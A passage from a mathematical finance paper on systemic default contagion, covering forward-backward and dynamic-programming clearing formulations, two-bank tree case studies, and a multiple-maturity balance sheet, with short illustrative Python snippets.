\item At $l = \ell$: $P_i(T,\omega_T) = \ind{\tau_i(\omega_T) > T} = \P(\tau_i > T | \mathcal{F}_T)(\omega_T)$ for every $\omega_T \in \Omega_T$ by construction of $\mathcal{F}_T = \mathcal{F}$.
\item At $l < \ell$: Assume $P_i(t_{l+1}) = \Psi_{\vec{P},i}^T(t_{l+1},\boldsymbol{\tau})$ at time $t_{l+1}$ almost surely. Fix $\omega_{t_l} \in \Omega_{t_l}$,
\begin{align*}
P_i(t_l,\omega_{t_l}) &= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) P_i(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})} = \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \P(\tau_i > T | \mathcal{F}_{t_{l+1}})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\tau_i > T , \omega_{t_{l+1}})}{\P(\omega_{t_l})} = \frac{\P(\tau_i > T , \omega_{t_l})}{\P(\omega_{t_l})} = \P(\tau_i > T | \mathcal{F}_{t_l})(\omega_{t_l}).
\end{align*}
\end{itemize}
\end{proof}
In fact,~\eqref{eq:1maturity-recursion} can be viewed as a fixed point in $\vec{P} \in \prod_{l = 0}^\ell [0,1]^{|\Omega_{t_l}| \times n}$ only. This can be done by explicitly defining the dependence of the net worths and default time on the probability of solvency. Specifically, this joint clearing problem in $(\vec{K},\vec{P},\boldsymbol{\tau})$ can be viewed as a forward-backward equation in $\vec{P}$ alone, i.e.,
\begin{equation}\label{eq:1maturity-recursion-P}
\vec{P} = \left[\bar\Psi^T_{\vec{P}}\left(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\Psi^T_{\boldsymbol{\tau}}\left(\Psi^T_{\vec{K}}(t_k,\vec{P}(t_k))_{k = 0}^\ell\right)\right)\right]_{l = 0}^\ell.
\end{equation}
We refer to this as a forward-backward equation since $\vec{P} \mapsto \Psi^T_{\boldsymbol{\tau}}(\Psi^T_{\vec{K}}(\cdot,\vec{P}))$ is calculated forward-in-time whereas $\bar\Psi^T_{\vec{P}}$ is computed recursively backward-in-time.
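To illustrate, the forward-backward system~\eqref{eq:1maturity-recursion-P} can be solved by Picard iteration started from $\vec{P} \equiv \vec{1}$ (the top of the lattice). The sketch below uses a toy two-bank, two-period binary tree with a single common multiplicative shock, recovery $\beta = 0$, and purely hypothetical figures.

```python
import numpy as np
from itertools import product

# Picard iteration for the forward-backward system in P alone, on a toy
# 2-bank, 2-period binary tree (equally likely branches; all parameters are
# hypothetical).  A node at time l is the tuple of the first l moves.
r, dt, ell, beta = 0.0, 1.0, 2, 0.0
L = np.array([[0.0, 1.0], [1.0, 0.0]])        # interbank face values due at T
pbar = L.sum(axis=1) + np.array([0.5, 0.5])   # total obligations per bank
nodes = {l: list(product((0, 1), repeat=l)) for l in range(ell + 1)}

def assets(node):                             # common multiplicative shock
    return np.array([1.6, 1.6]) * np.prod([1.5 if m else 0.5 for m in node])

P = {l: {nd: np.ones(2) for nd in nodes[l]} for l in range(ell + 1)}
while True:
    # forward pass: net worths K and terminal survival indicators 1{tau_i > T}
    K = {l: {nd: assets(nd) + np.exp(-r * dt * (ell - l))
                 * (L.T @ (beta + (1 - beta) * P[l][nd]) - pbar)
             for nd in nodes[l]} for l in range(ell + 1)}
    surv = {path: np.all([K[l][path[:l]] >= 0 for l in range(ell + 1)], axis=0)
            for path in nodes[ell]}
    # backward pass: conditional survival probabilities
    newP = {ell: {nd: surv[nd].astype(float) for nd in nodes[ell]}}
    for l in range(ell - 1, -1, -1):
        newP[l] = {nd: 0.5 * (newP[l + 1][nd + (0,)] + newP[l + 1][nd + (1,)])
                   for nd in nodes[l]}
    if all(np.allclose(P[l][nd], newP[l][nd]) for l in P for nd in P[l]):
        break
    P = newP
```

In this toy instance the iteration stabilizes after three passes: a first down move pushes both banks into default at $t_1$ once interbank claims are marked down, so each bank's time-$0$ survival probability is $1/2$.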
\begin{corollary}\label{cor:1maturity-recursion}
$(\vec{K},\vec{P},\boldsymbol{\tau}) \in \mathbb{D}^T$ is a clearing solution of~\eqref{eq:1maturity} if and only if $\vec{P}$ is a fixed point of~\eqref{eq:1maturity-recursion-P} with $\vec{K} = \Psi^T_{\vec{K}}(t_l,\vec{P}(t_l))_{l = 0}^\ell$ and $\boldsymbol{\tau} = \Psi^T_{\boldsymbol{\tau}}(\Psi^T_{\vec{K}}(t_l,\vec{P}(t_l))_{l = 0}^\ell)$.
\end{corollary}
\begin{proof}
This is an immediate consequence of Proposition~\ref{prop:1maturity-recursion}.
\end{proof}
\subsection{Dynamic programming principle representation}\label{sec:1maturity-dpp}
With~\eqref{eq:1maturity-recursion}, we provided a recursive formulation for the clearing solutions. Within this section we will find an additional equivalent clearing problem that directly makes use of the dynamic programming principle for the \emph{maximal} clearing solution. This formulation is used in Lemma~\ref{lemma:markov} to prove that the maximal clearing solution $(\vec{K}^\uparrow,\vec{P}^\uparrow,\boldsymbol{\tau}^\uparrow) \in \mathbb{D}^T$ of~\eqref{eq:1maturity} (proven to exist in Theorem~\ref{thm:1maturity-exist}) is Markovian. Additionally, it is this dynamic programming formulation that allows us to study the multiple maturity setting in Section~\ref{sec:Kmaturity}.
\begin{remark}
Throughout this section, we focus entirely on the maximal clearing solution. The minimal clearing solution can likewise be considered with only small alterations to the proofs.
\end{remark}
To formalize the clearing problem as the dynamic programming principle, we need to introduce the operator $\FIX$ which we use to denote the \emph{maximal} fixed point.
With this fixed point operator, we can define the following equivalent clearing problem in $(\vec{K},\vec{P})$ reliant on the propagation of information forward-in-time through the auxiliary variables $\boldsymbol{\iota} \in \{0,1\}^n$. Specifically, consider $\hat\Psi^T: \mathbb{I} \to \mathcal{L}_T \times \mathcal{L}_T$ where $\mathbb{I} := \{(t_l,\boldsymbol{\iota}) \; | \; l \in \{0,1,...,\ell\}, \; \boldsymbol{\iota} \in \{0,1\}^{|\Omega_{t_{[l-1]^+}}| \times n}\}$ (with $\hat\Psi^T(t,\boldsymbol{\iota}) \in \hat\mathbb{D}^T(t) := \{(\vec{K}(t),\vec{P}(t)) \; | \; (\vec{K},\vec{P},T\vec{1}) \in \mathbb{D}^T\}$ for any time $t$) constructed as:
\begin{align}\label{eq:1maturity-dpp}
\hat\Psi^T(t_l,\boldsymbol{\iota}) &:= \left(\begin{array}{c}\hat\Psi^T_{\vec{K}}(t_l,\boldsymbol{\iota}) \\ \hat\Psi^T_{\vec{P}}(t_l,\boldsymbol{\iota})\end{array}\right) \\
\nonumber &=
\begin{cases}
\FIX_{(\tilde\vec{K},\tilde\vec{P}) \in \hat\mathbb{D}^T(t_l)} \left(\begin{array}{c} \Psi^T_{\vec{K}}(t_l,\tilde\vec{P}) \\ \left[\sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\hat\Psi^T_{\vec{P}}(t_{l+1},\diag{\boldsymbol{\iota}(\omega_{t_l})}\ind{\tilde\vec{K}(\omega_{t_l}) \geq \vec{0}},\omega_{t_{l+1}})}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}} \end{array}\right) &\text{if } l < \ell \\
\FIX_{(\tilde\vec{K},\tilde\vec{P}) \in \hat\mathbb{D}^T(T)} \left(\begin{array}{c} \Psi^T_{\vec{K}}(T,\tilde\vec{P}) \\ \diag{\boldsymbol{\iota}}\ind{\tilde\vec{K} \geq \vec{0}} \end{array}\right) &\text{if } l = \ell
\end{cases}
\end{align}
where $\boldsymbol{\iota}$ denotes the prior information on whether a bank has defaulted ($\iota_i = 0$) or not ($\iota_i = 1$) up to time $t_{l-1}$ when being used as an input for time $t_l$.
Before continuing, we wish to remark that $\hat\Psi^T(t,\boldsymbol{\iota})$ is well-defined insofar as the maximal fixed point exists for every time $t$ and set of solvent banks $\boldsymbol{\iota}$.
\begin{proposition}\label{prop:1maturity-dpp-define}
$\hat\Psi^T(t,\boldsymbol{\iota})$ is well-defined for every $(t,\boldsymbol{\iota}) \in \mathbb{I}$, i.e., the maximal fixed point exists (and is unique) for any combination of inputs.
\end{proposition}
\begin{proof}
As with Theorem~\ref{thm:1maturity-exist}, this result follows from a trivial application of Tarski's fixed point theorem.
\end{proof}
\begin{proposition}\label{prop:1maturity-dpp}
Let $(\vec{K},\vec{P})$ be the realized solution from $\hat\Psi^T(0,\vec{1})$, i.e., $(\vec{K}(0,\omega_0),\vec{P}(0,\omega_0)) = \hat\Psi^T(0,\vec{1},\omega_0)$ and $(\vec{K}(t_l,\omega_{t_l}),\vec{P}(t_l,\omega_{t_l})) = \hat\Psi^T(t_l,\ind{\inf_{k < l} \vec{K}(t_k,\omega_{t_l}) \geq \vec{0}},\omega_{t_l})$ for every $\omega_{t_l} \in \Omega_{t_l}$ and $l = 1,2,...,\ell$. Then $(\vec{K},\vec{P},\Psi^T_{\boldsymbol{\tau}}(\vec{K}))$ is the \emph{maximal} fixed point to~\eqref{eq:1maturity}.
\end{proposition}
\begin{proof}
Define $(\vec{K},\vec{P})$ to be the realized solution from $\hat\Psi^T(0,\vec{1})$. Let $\boldsymbol{\tau} := \Psi_{\boldsymbol{\tau}}^T(\vec{K})$ be the associated default times and $\boldsymbol{\iota}(t_l,\omega_{t_l}) := \prod_{k = 0}^{l-1} \ind{\vec{K}(t_k,\omega_{t_l}) \geq \vec{0}}$ be the realized (auxiliary) solvency process at time $t_l$ and in state $\omega_{t_l} \in \Omega_{t_l}$ (with $\boldsymbol{\iota}(0,\omega_0) = \vec{1}$).
(We wish to note that $\boldsymbol{\iota}(t_l) \in \mathcal{L}_{t_{[l-1]^+}}^n$ and as such could be indexed by the preceding states $\omega_{t_{[l-1]^+}} \in \Omega_{t_{[l-1]^+}}$ instead; we leave the use of $\omega_{t_l}$ as we find it is clearer notationally.)
First, we will show that $(\vec{K},\vec{P},\boldsymbol{\tau})$ is a clearing solution of~\eqref{eq:1maturity} via the representation~\eqref{eq:1maturity-recursion}, i.e., $(\vec{K},\vec{P},\boldsymbol{\tau}) = \bar\Psi^T(\vec{K},\vec{P},\boldsymbol{\tau})$.
Second, we will show that this solution must be the maximal clearing solution as proven to exist in Theorem~\ref{thm:1maturity-exist}.
\begin{enumerate}
\item By construction of $\hat\Psi^T$, $(\vec{K},\vec{P},\boldsymbol{\tau}) = \bar\Psi^T(\vec{K},\vec{P},\boldsymbol{\tau})$ if and only if $\vec{P}(t_l) = \bar\Psi^T_{\vec{P}}(t_l,\vec{P}(t_{[l+1]\wedge\ell}),\boldsymbol{\tau})$ for every time $l \in \{0,1,...,\ell\}$.
At maturity, $\vec{P}(T) = \bar\Psi^T_{\vec{P}}(T,\vec{P}(T),\boldsymbol{\tau})$ trivially by construction of $\boldsymbol{\tau}$.
Consider now $l < \ell$ and assume $\vec{P}(t_{l+1}) = \hat\Psi^T_{\vec{P}}(t_{l+1},\boldsymbol{\iota}(t_{l+1}))$. By construction, $\vec{P}(t_l,\omega_{t_l}) = \bar\Psi^T_{\vec{P}}(t_l,\vec{P}(t_{l+1}),\boldsymbol{\tau},\omega_{t_l})$ for every $\omega_{t_l} \in \Omega_{t_l}$ and the result is proven.
\item Now assume there exists some clearing solution $(\vec{K}^\dagger,\vec{P}^\dagger,\boldsymbol{\tau}^\dagger) \gneq (\vec{K},\vec{P},\boldsymbol{\tau})$. Then we can rewrite the form of $(\vec{K}^\dagger,\vec{P}^\dagger)$ as:
\begin{align*}
(\vec{K}^\dagger,\vec{P}^\dagger) &= (\Psi^T_{\vec{K}}(t_l,\vec{P}^\dagger(t_l)) , \bar\Psi^T_{\vec{P}}(t_l,\vec{P}^\dagger(t_{[l+1]\wedge\ell}),\Psi^T_{\tau}(\vec{K}^\dagger)))_{l = 0}^\ell
\end{align*}
through the use of the clearing formulation $\bar\Psi^T$ and explicitly applying $\boldsymbol{\tau}^\dagger = \Psi^T_{\boldsymbol{\tau}}(\vec{K}^\dagger)$. Following the logic of the prior section of this proof, it must follow that
\begin{equation*}
\vec{P}^\dagger(t_l,\omega_{t_l}) = \begin{cases} \diag{\ind{\inf_{k < l} \vec{K}^\dagger(t_k,\omega_{t_l}) \geq \vec{0}}} \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \vec{P}^\dagger(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})} &\text{if } l < \ell \\ \ind{\inf_{k \in [0,\ell]} \vec{K}^\dagger(t_k,\omega_T) \geq \vec{0}} &\text{if } l = \ell \end{cases}
\end{equation*}
for every time $t_l$ and state $\omega_{t_l} \in \Omega_{t_l}$.
That is, $(\vec{K}^\dagger(t_l),\vec{P}^\dagger(t_l))$ satisfies all of the fixed point problems within the construction of $\hat\Psi^T(t_l,\ind{\inf_{k < l} \vec{K}^\dagger(t_k) \geq \vec{0}})$ at all times $t_l$.
We will complete this proof via backwards induction with, to simplify notation, $\boldsymbol{\iota}(t_l) = \ind{\inf_{k < l} \vec{K}^\dagger(t_k) \geq \vec{0}}$.
Consider the maturity $T$; it must follow that $(\vec{K}^\dagger(T),\vec{P}^\dagger(T)) \leq \hat\Psi^T(T,\boldsymbol{\iota}(T))$ by the definition of the maximal fixed point operator $\FIX$.
Consider some time $t_l < T$ and assume $(\vec{K}^\dagger(t_{l+1}),\vec{P}^\dagger(t_{l+1})) \leq \hat\Psi^T(t_{l+1},\boldsymbol{\iota}(t_{l+1}))$. By the backward recursion used within $\hat\Psi^T_{\vec{P}}(t_l,\boldsymbol{\iota}(t_l))$, it follows that
\begin{align*}
\vec{P}^\dagger(t_l) &= \diag{\boldsymbol{\iota}(t_l)}\left[\sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\vec{P}^\dagger(t_{l+1},\omega_{t_{l+1}})}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}} \\
&\leq \diag{\boldsymbol{\iota}(t_l)}\left[\sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\hat\Psi^T_{\vec{P}}(t_{l+1},\boldsymbol{\iota}(t_{l+1},\omega_{t_{l+1}}),\omega_{t_{l+1}})}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}}.
\end{align*}
Further, by the monotonicity of $\Psi^T_{\vec{K}}$, it follows that $(\vec{K}^\dagger(t_l),\vec{P}^\dagger(t_l)) \leq \hat\Psi^T(t_l,\boldsymbol{\iota}(t_l))$.
This, together with the trivial monotonicity of $\hat\Psi^T$ w.r.t.\ the solvency indicator $\boldsymbol{\iota}$, contradicts the original assumption that $(\vec{K}^\dagger,\vec{P}^\dagger,\boldsymbol{\tau}^\dagger) \gneq (\vec{K},\vec{P},\boldsymbol{\tau})$.
\end{enumerate}
\end{proof}
We conclude this discussion of the single maturity clearing problem by proving that the maximal clearing solution is Markovian on the extended state space $(\vec{x},\vec{K},\vec{P},\boldsymbol{\iota})$. Without the inclusion of the auxiliary variable $\boldsymbol{\iota}$, the solution $(\vec{x},\vec{K},\vec{P})$ is clearly not Markovian.
\begin{lemma}\label{lemma:markov}
Consider Markovian external assets $\vec{x}(t_l) = f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l))$ for independent perturbations $\tilde\epsilon$.
Let $(\vec{K},\vec{P})$ be the realized solution from $\hat\Psi^T(0,\vec{1})$ with $\boldsymbol{\iota}(t_l) := \prod_{k = 0}^{l-1} \ind{\vec{K}(t_k) \geq \vec{0}}$ denoting the realized solvency process.
Then the joint process $(\vec{x},\vec{K},\vec{P},\boldsymbol{\iota})$ is Markovian.
\end{lemma}
\begin{proof}
Note that $\boldsymbol{\iota}(t_l) = \diag{\boldsymbol{\iota}(t_{l-1})}\ind{\vec{K}(t_{l-1}) \geq \vec{0}}$.
Therefore Markovianity follows directly from~\eqref{eq:1maturity-dpp} as $(\vec{K}(t_l),\vec{P}(t_l)) = \hat\Psi^T(t_l,\boldsymbol{\iota}(t_l);\vec{x}(t_l)) = \hat\Psi^T(t_l,\diag{\boldsymbol{\iota}(t_{l-1})}\ind{\vec{K}(t_{l-1}) \geq \vec{0}};f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l)))$.
\end{proof}
\subsection{Case studies}\label{sec:1maturity-cs}
For the case studies within this section, recall the geometric random walk~\eqref{eq:gbm} constructed on the tree $(\Omega^n,\mathcal{F}^n,(\mathcal{F}^n_{l\Delta t})_{l = 0}^{T/\Delta t},\P^n)$ within Section~\ref{sec:setting-tree}.
That is, we consider the assets $x_k$ of each bank $k$ to be generated by
\begin{align*}
x_k(t+\Delta t,\omega_{t+\Delta t,(n+1)(i-1)+j}^n) &= x_k(t,\omega_{t,i}^n)\exp\left((r - \frac{\sigma_{kk}^2}{2})\Delta t + \sigma_k^\top \tilde{\epsilon}_j\sqrt{\Delta t}\right)
\end{align*}
for some initial point $\vec{x}(0,\Omega^n) \in \mathbb{R}^n_{++}$, correlation structure $\sigma$, and such that $\tilde{\epsilon} = (\tilde{\epsilon}_1,...,\tilde{\epsilon}_{n+1}) \in \mathbb{R}^{n \times (n+1)}$ is generated from an $(n+1)\times(n+1)$ orthogonal matrix as in~\cite{he1990convergence}.
Define the discounted assets as
\[
\tilde{\vec{x}}(t,\omega_t^n) := \exp(-rt)\vec{x}(t,\omega_t^n)
\]
for every time $t$ and state $\omega_t^n \in \Omega_t^n$. One can check that these discounted asset values $\tilde{\vec{x}}$ are martingales.
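The branch shocks $\tilde{\epsilon}_j$ can be constructed by orthogonalizing against the constant vector. The sketch below (with arbitrary seed and dimension) produces $n+1$ equally likely shock vectors with mean zero and identity covariance, the moment-matching property underlying the weak convergence in~\cite{he1990convergence}.

```python
import numpy as np

# Construct the n+1 branch shocks of the tree: take an orthogonal (n+1)x(n+1)
# matrix Q whose first column is proportional to the ones vector, then scale
# the remaining columns by sqrt(n+1).  Column j of eps is the shock vector on
# branch j, and every branch carries probability 1/(n+1).
n = 3
rng = np.random.default_rng(0)
A = np.column_stack([np.ones(n + 1), rng.standard_normal((n + 1, n))])
Q, _ = np.linalg.qr(A)                  # Q[:, 0] = +/- ones / sqrt(n+1)
eps = np.sqrt(n + 1) * Q[:, 1:].T       # shape (n, n+1)
mean = eps.mean(axis=1)                 # zero: columns of Q are orthogonal to 1
cov = (eps @ eps.T) / (n + 1)           # identity: columns are orthonormal
```

Mean zero and identity covariance follow directly from the orthonormality of the columns of $Q$, so the single-step shocks match the first two moments of a standard normal vector.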
We will consider two primary case studies within this section to demonstrate the details of this single maturity model. First, we will present sample paths of the clearing solution over time to investigate the contagion mechanism in practice. Second, we will vary the correlation structure between banks in order to investigate the sensitivity of the model to this parameter. For simplicity, we will assume the recovery rate $\beta = 0$ throughout these case studies so that we generalize, e.g., the Gai--Kapadia system~(\cite{GK10}).
\subsubsection{Sample paths}\label{sec:1maturity-cs-path}
In order to demonstrate the network dynamics of this contagion model, we will consider an illustrative simple 2 bank (plus society node) system with zero risk-free rate $r = 0$. We will consider the terminal time $T = 1$ with time intervals $\Delta t = 0.1$. At the maturity $T$, the network of obligations is given by
\[\vec{L}_0 = \left(\begin{array}{ccc} 0.5 & 1 & 0 \\ 0.5 & 0 & 1 \end{array}\right)\]
where the first column indicates the external obligations.
The external assets have the same variance $\sigma^2 = 0.25$ with correlation of $\rho = 0.5$; both banks begin with $x_i(0) = 1.5$ in external assets for $i \in \{1,2\}$.
With this simple setting, we are able to use the forward-backward model~\eqref{eq:1maturity-recursion} to compute the clearing net worths $\vec{K}$ and probabilities of solvency $\vec{P}$. In Figure~\ref{fig:path}, a single sample path of the external assets $\vec{x}(\omega)$, net worths $\vec{K}(\omega)$, and probabilities of solvency $\vec{P}(\omega)$ is displayed. Along this sample path, bank $2$ (displayed in red) defaults on its obligations at time $t = 0.7$ though bank $1$ (displayed in blue) remains solvent until maturity. This is clearly seen in both Figure~\ref{fig:path-K} of the net worths and Figure~\ref{fig:path-P} of the probability of solvency. Notably, even at time $t = 0.7$, bank $2$'s external assets are approximately $x_2(0.7) \approx 0.769$; this means that, without considering default contagion (i.e., marking all interbank assets in full), bank $2$ would \emph{not} be in default.
This demonstrates the impact of using this endogenous network valuation adjustment since, along this path, bank $1$ does not default, yet the possibility that it fails to repay its obligations due to uncertainty in the future forces bank $2$ to mark down its interbank assets enough so that it is driven into insolvency. Thus, a type of default contagion from bank $1$ to itself over time (in unrealized paths of the tree) leads to the interbank default contagion that is more typically studied in the Gai--Kapadia model.
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.3\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankPath-x.eps}
\caption{External assets $\vec{x}$}
\label{fig:path-x}
\end{subfigure}
~
\begin{subfigure}[t]{0.3\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankPath-K.eps}
\caption{Net worths $\vec{K}$}
\label{fig:path-K}
\end{subfigure}
~
\begin{subfigure}[t]{0.3\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankPath-P.eps}
\caption{Probabilities of solvency $\vec{P}$}
\label{fig:path-P}
\end{subfigure}
\caption{Section~\ref{sec:1maturity-cs-path}: A single sample path for the external assets $\vec{x}$, net worths $\vec{K}$, and probabilities of solvency $\vec{P}$ for both banks.}
\label{fig:path}
\end{figure}
\subsubsection{Dependence on correlation}\label{sec:1maturity-cs-corr}
Consider again the simple $n = 2$ bank network of Section~\ref{sec:1maturity-cs-path}. Rather than study a single sample path of this system, we will instead vary the correlation $\rho \in (-1,1)$ to characterize the nontrivial behavior of this clearing model. As we will only investigate the behavior of the system at the initial time $t = 0$, and because the system is symmetric, throughout this case study we will without loss of generality only discuss bank $1$.
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankCorr-P-10.eps}
\caption{The probability of solvency $P_1(0)$ at time $t = 0$ for bank $1$.}
\label{fig:corr-P}
\end{subfigure}
~
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankCorr-defaults.eps}
\caption{The probability of one or both banks being in default as measured at time $t = 0$.}
\label{fig:corr-defaults}
\end{subfigure}
\caption{Section~\ref{sec:1maturity-cs-corr}: The impact of the correlation $\rho \in (-1,1)$ between the external asset values on the health of the financial system as measured by probabilities of solvency/default.}
\label{fig:corr}
\end{figure}
The probability of solvency $P_1(0)$ at time $t = 0$ as a function of the correlation $\rho$ between the banks' external assets is provided in Figure~\ref{fig:corr-P}; we wish to note that, due to the construction of this network, $K_1(0) = P_1(0)$. Notably, the response of the probability of solvency to $\rho$ follows a staircase structure.
This structure is due to the discrete nature of the tree model considered within this work. Specifically, because of the discrete time points and asset values, moving a branch of the tree enough to push a bank from solvency into default (or vice versa) requires a sufficiently large change in the system parameters (e.g., the correlation); once such a change occurs, the possibility of contagion across time and between banks can produce knock-on effects that generate large jumps in the health of the financial system. These probabilities of solvency can be compared to the probability of solvency without consideration for the interbank network (i.e., setting $L_{12} = L_{21} = 0$). Without an interbank network there is no avenue for contagion within this system and, as such, bank $1$ is solvent in more scenarios under this setting. In fact, the only influence that the asset correlation $\rho$ has in this no-interbank-network setting is due to the construction of the tree following~\cite{he1990convergence}.
In Figure~\ref{fig:corr-defaults}, we investigate the probability of defaults. For this we take the view of a regulator who would be concerned with the number of defaults but not which institution is failing.
The blue solid line displays the probability that at least one of the banks will default (as measured at time $t = 0$). As with the probability that bank $1$ is solvent $P_1(0)$, this has a step structure that is non-monotonic in the correlation $\rho$.
The red dashed line displays the probability that both banks will default (as measured at time $t = 0$). Here we see that, though there is roughly a 5\% chance that there is a default in the system when $\rho \approx -1$, there is no possibility of a joint default when the banks' external assets are highly negatively correlated. As the correlation increases, so does the likelihood of contagion in which both banks default (up until the banks default simultaneously, without the need for contagion, if $\rho = 1$).
We wish to conclude this case study by comparing the non-monotonicity exhibited here with the network valuation adjustment considered in~\cite{banerjee2022pricing}. In that work, which focuses on the Eisenberg--Noe clearing model~(\cite{EN01,RV13}) without early defaults, the comonotonic scenario (i.e., $\rho = 1$) is found to have the largest default contagion. Herein, with early defaults, we find that this no longer holds.
There does exist a general downward trend in the probability of solvency, with the highest probability of solvency occurring near $\rho \approx -1$. When the correlations are highly negative, one bank being in distress (through the downward drift of its external assets) directly implies that the other bank has a large surplus; in this way the interbank assets act as a diversifying investment that reduces the risk of default.
However, in contrast to the downward trend evidenced in the probability of solvency, a significant upward jump is evidenced at $\rho \approx 0.75$. This non-monotonicity makes clear the non-triviality of the constructed systemic model.
\section{Multiple maturity setting}\label{sec:Kmaturity}
In contrast to the prior section in which all obligations are due at the same maturity $T$, we now wish to consider the possibility of obligations at every time $t_l$. At each maturity time $t_l$ a network of obligations $\vec{L}^l$ exists; the balance sheet is otherwise constructed as in the single maturity setting presented in Section~\ref{sec:1maturity-bs}. As in~\cite{KV16,BBF18}, if a bank defaults on an obligation then it also defaults on all subsequent obligations. Herein, as opposed to the structure of the single maturity setting in Section~\ref{sec:1maturity}, we need to distinguish between solvency and liquidity as a bank may have positive capital but be unable to satisfy its short-term obligations.
We review the balance sheet of the banks in the system within Section~\ref{sec:Kmaturity-bs} with emphasis on the additional considerations when multiple maturities are included.
The constructed mathematical model for this multiple maturity setting is provided within Section~\ref{sec:Kmaturity-model}. Rather than providing detailed equivalent forward-backward and dynamic programming formulations, we only comment on how such models can be presented in this setting.
This model is then used in Section~\ref{sec:Kmaturity-cs} to consider the implications of default contagion on the term structures for bank liabilities.
\subsection{Balance sheet construction}\label{sec:Kmaturity-bs}
Following the balance sheet constructed within Section~\ref{sec:1maturity-bs}, but with minor modifications, banks hold \emph{three} types of assets at time $t_l$: external (risky) assets $x_i(t_l) \in \mathcal{L}_{t_l}$, external (risk-free) assets, and interbank assets $\sum_{j = 1}^n L_{ji}^k$ at time $t_k$ with $k > l$, where $L_{ji}^k \geq 0$ is the total obligation from bank $j$ to $i$ at time $t_k$ ($L_{ii}^k = 0$ so as to avoid self-dealing). Notably, as the bank may have received interbank payments at times $t_k$ with $k \leq l$ as well, the bank may have assets held in the risk-free asset. Specifically, at time $t_l$, the bank can split its cash holdings between its external risky and risk-free assets so that the (simple) return from time $t_l$ to $t_{l+1}$ is:
\[R_i(t_{l+1},\alpha_i(t_l)) := \left[e^{r(t_{l+1}-t_l)}\alpha_i(t_l) + \frac{x_i(t_{l+1})}{x_i(t_l)}(1-\alpha_i(t_l))\right]-1\]
where $\alpha_i(t_l) \in \mathcal{L}_{t_l}$ provides the fraction of the cash account invested at time $t_l$ in the risk-free asset and, accordingly, $1-\alpha_i(t_l)$ provides the fraction of the cash account invested at time $t_l$ in the risky asset. We will assume throughout this section that $\alpha_i(t_l,\omega_{t_l}) \in [0,1]$ so that bank $i$ is long in both assets.
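For readers who prefer a computational view, the blended return above can be sketched as follows; this Python fragment is purely illustrative, and the function name and argument names are our own rather than part of the model.

```python
import math

def blended_return(alpha, r, dt, x_now, x_next):
    """One-period simple return of a portfolio holding a fraction ``alpha``
    in the risk-free bond and ``1 - alpha`` in the risky external asset."""
    assert 0.0 <= alpha <= 1.0, "long-only constraint: alpha in [0, 1]"
    return math.exp(r * dt) * alpha + (x_next / x_now) * (1.0 - alpha) - 1.0
```

Setting $\alpha = 1$ recovers the risk-free return $e^{r\Delta t}-1$, while $\alpha = 0$ recovers the risky return $x_i(t_{l+1})/x_i(t_l)-1$.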
Likewise, the bank has liabilities $\sum_{j = 1}^n L_{ij}^k + L_{i0}^k$ at time $t_k$ where $L_{i0}^k \geq 0$ denotes the external obligations of bank $i$ at time $t_k$. To simplify the mathematical expressions below we will define $L_{0i}^l = 0$ for all times $t_l$; furthermore to avoid the need to consider defaults due to the initial setup of the system, we will assume $L_{ij}^0 = 0$ for all pairs of banks $i,j$ so that no obligations are due at time $t_0 = 0$.
As in~\cite{KV16}, when a bank defaults on its obligations at time $t_l$, it also does so for all of its obligations at time $t_k > t_l$ as well. However, in contrast to that work but similarly to~\cite{BBF18}, the recovery on defaulted obligations occurs immediately after the clearing date (i.e., at time $t_l^+$) to account for any delays associated with the bankruptcy procedure. That is, a 0 recovery rate is assumed at the clearing time, but a $\beta \in [0,1]$ recovery of liabilities occurs immediately after.
As mentioned above, we have thus far ignored the cash account $V_i(t_l)$. The evolution of the cash account is driven by the reinvestment of the cash account from the prior time step (including any recovery of defaulting assets at time $t_{l-1}$) and the (realized) net payments (following the Gai--Kapadia setting (\cite{GK10})). This provides a recursive formulation for the cash account:
\begin{align*}
V_i(t_l) = (1+&R_i(t_l,\alpha_i(t_{l-1})))\left(V_i(t_{l-1}) + \beta\sum_{k = l-1}^{\ell} e^{-r(t_k-t_{l-1})} \sum_{j = 1}^n L_{ji}^k \ind{j \text{ defaulted at } t_{l-1}}\right) \\
&+ \sum_{j = 0}^n \left[L_{ji}^l \ind{j \text{ is solvent at } t_l} - L_{ij}^l\right]
\end{align*}
for $l = 1,...,\ell$ and initial condition $V_i(t_0) := x_i(t_0)$.
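The recursion above amounts to simple bookkeeping on each scenario: grow the prior cash account (plus any recoveries from the previous date) at the realized blended return, then net the interbank flows due at the current date. A minimal sketch, with all scenario-dependent inputs assumed precomputed:

```python
def cash_account_step(V_prev, R, recovery_prev, inflows, outflows):
    """V(t_l) = (1 + R) * (V(t_{l-1}) + recovery at t_{l-1}^+)
                + payments received at t_l - own obligations due at t_l."""
    return (1.0 + R) * (V_prev + recovery_prev) + inflows - outflows
```

For instance, a bank with $V_i(t_{l-1}) = 1$, no recoveries, a realized return of $5\%$, incoming payments of $0.2$, and obligations of $0.3$ ends the period with $1.05 + 0.2 - 0.3 = 0.95$.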
